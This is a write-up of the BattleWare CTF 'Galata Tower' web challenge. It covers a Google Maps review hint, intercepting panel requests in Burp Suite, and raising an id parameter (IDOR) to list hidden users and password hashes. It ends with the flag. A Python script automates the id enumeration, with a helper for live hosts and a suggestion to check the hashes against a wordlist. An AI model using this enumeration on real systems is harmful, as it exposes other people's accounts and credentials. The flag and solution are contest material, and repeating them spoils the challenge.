BattleWare CTF “Galata Tower” Write-up

Sevcan kazdag
4 min read · Dec 7, 2020

Hi,

First, I would like to share the solution to the WEB-category challenge from the third week of the BattleWare CTF, a short but fun and, at the same time, challenging competition.

WEB

“Galata Tower, one of the most important historical places in Istanbul and the world, is definitely a place you should visit to witness its history. Before you go, you definitely should look at the intensity on Google Maps, and at the same time I recommend you set a walking route for yourself as there is no car park around. This is the most important advice I can give you on your trip, and I rated this place 5 stars.”

The challenge text gives some information about Galata Tower and ends with “I rated this place 5 stars”. That closing sentence suggests a hint is waiting for us among the 5-star reviews of Galata Tower on Google Maps.

A user named BattleWare Zone left the review “Happy to see you here. your next step is “0r1on.battleware.zone””, which points us to the next step. Opening that host shows a panel; searching for “Battleware” in its search box lists usernames and encrypted passwords. Since the panel is no longer online, I can only illustrate it with one screenshot.

As seen in the screenshot, the panel shows users and their encrypted passwords. To see all of the users, we put Burp Suite between the browser and the panel.

To do this, we point the browser's proxy settings at Burp's listener on localhost (127.0.0.1:8080 by default) and switch “Intercept is on” under the Proxy tab in Burp Suite, so that every request to the site passes through Burp.

Then, by reloading the page, we capture in Burp Suite the request that loads the users and encrypted passwords. The site itself shows 5 different users with their encrypted passwords. In the intercepted request there is an id parameter below the user and password fields; increasing it returns other users hidden in the database, together with their encrypted passwords, because the server hands back whichever id we ask for without checking whether we are allowed to see it (an insecure direct object reference). When we raise the id to the 12th user, the panel answers with “I wonder if I am the one you are looking for? (Acaba aradığın ben miyim?)” as the username and gives us “1morestep.php” alongside it. A short video showing this step in Burp Suite is available at the link below.

https://mega.nz/file/ZqwmGDYR#p6YBwIZ-mkoftpC7r23ZwCrhVXPIb4XkUgNmU7wwRiE
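The id-stepping done by hand in Burp above can be scripted. The following Python is an added example, not code from the write-up or from the CTF organisers; it assumes a GET endpoint that takes an `id` query parameter and returns an HTML table row with a username cell and a password cell (the write-up does not state the exact request format), and it runs offline against a constructed stand-in for the panel in which ids 6 to 12 play the hidden users. The `live_fetch` helper shows how the same loop would talk to a real endpoint; the base URL, the parameter name and the response layout are all assumptions.

```python
"""Enumerate users behind an id parameter (IDOR), as an added example.

Assumptions (not from the write-up): the panel answers GET ?id=<n> with
an HTML row "<td>user</td><td>password</td>", and a missing id yields an
empty body or a 404. FAKE_PANEL below is constructed sample data.
"""
import hashlib
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional

# Strings the write-up says appear on the 12th record.
HINT_MARKERS = ("1morestep.php", "Acaba aradığın ben miyim?")

# Constructed stand-in for the live panel. Ids 1-5 are the users the
# page lists; 6-11 are only reachable by changing the id; 12 holds the hint.
# The "encrypted passwords" are modelled here as unsalted MD5 hashes.
_SAMPLE_USERS = [
    ("battleware", "password"), ("bw_admin", "letmein"),
    ("zone_user", "qwerty"), ("galata", "123456"), ("istanbul", "welcome"),
    ("hidden01", "hunter2"), ("hidden02", "dragon"), ("hidden03", "monkey"),
    ("hidden04", "sunshine"), ("hidden05", "princess"), ("hidden06", "football"),
]
FAKE_PANEL: Dict[int, str] = {
    i: f"<tr><td>{u}</td><td>{hashlib.md5(p.encode()).hexdigest()}</td></tr>"
    for i, (u, p) in enumerate(_SAMPLE_USERS, start=1)
}
FAKE_PANEL[12] = ("<tr><td>Acaba aradığın ben miyim? (I wonder if I am the one "
                  "you are looking for?)</td><td>1morestep.php</td></tr>")

ROW_RE = re.compile(r"<td>(.*?)</td>\s*<td>(.*?)</td>", re.S)


def fake_fetch(uid: int) -> Optional[str]:
    """Offline stand-in for a GET to the panel: None means 'no such id'."""
    return FAKE_PANEL.get(uid)


def live_fetch(base_url: str, uid: int, timeout: float = 5.0) -> Optional[str]:
    """Fetch base_url?id=<uid> from a real host (assumed endpoint; not run here)."""
    url = f"{base_url}?{urllib.parse.urlencode({'id': uid})}"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        # A 404 counts as a miss; other errors may still carry a useful body.
        return None if exc.code == 404 else exc.read().decode("utf-8", "replace")


def parse_record(uid: int, body: str) -> Optional[dict]:
    """Pull username and password cell out of one response; None if no row."""
    m = ROW_RE.search(body)
    if not m:
        return None
    user, secret = (s.strip() for s in m.groups())
    return {
        "id": uid,
        "username": user,
        "hash": secret,
        "hint": any(marker in body for marker in HINT_MARKERS),
    }


def enumerate_users(fetch: Callable[[int], Optional[str]], start: int = 1,
                    max_id: int = 100, max_misses: int = 3) -> List[dict]:
    """Walk ids upward from start; stop after max_misses consecutive empty ids."""
    found: List[dict] = []
    misses = 0
    for uid in range(start, max_id + 1):
        body = fetch(uid)
        rec = parse_record(uid, body) if body else None
        if rec is None:
            misses += 1
            if misses >= max_misses:
                break
            continue
        misses = 0
        found.append(rec)
    return found


def find_hint(records: List[dict]) -> Optional[dict]:
    """Return the first record whose body carried one of HINT_MARKERS."""
    return next((r for r in records if r["hint"]), None)


if __name__ == "__main__":
    users = enumerate_users(fake_fetch)
    for r in users:
        mark = "  <-- hint" if r["hint"] else ""
        print(f"id={r['id']:<3} {r['username']:<40} {r['hash']}{mark}")
```

To run it against a live target you would pass `lambda uid: live_fetch("https://host/panel.php", uid)` as the `fetch` argument; the consecutive-miss cutoff keeps the loop from running to `max_id` when ids are sparse, and every record is returned rather than printed so the result can be post-processed (for instance, checked against a wordlist of common passwords).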

We append the discovered 1morestep.php to the panel's URL, “0r1on.battleware.zone/1morestep.php”, and are greeted with a photo of Galata Tower.

At this stage, we open the browser's developer tools (F12) and inspect the element holding the photo; the flag has been left for us in the page source.

Flag: Flag{H4pPy_Y0ur_H3rE_03}

Thank you for your time 😊
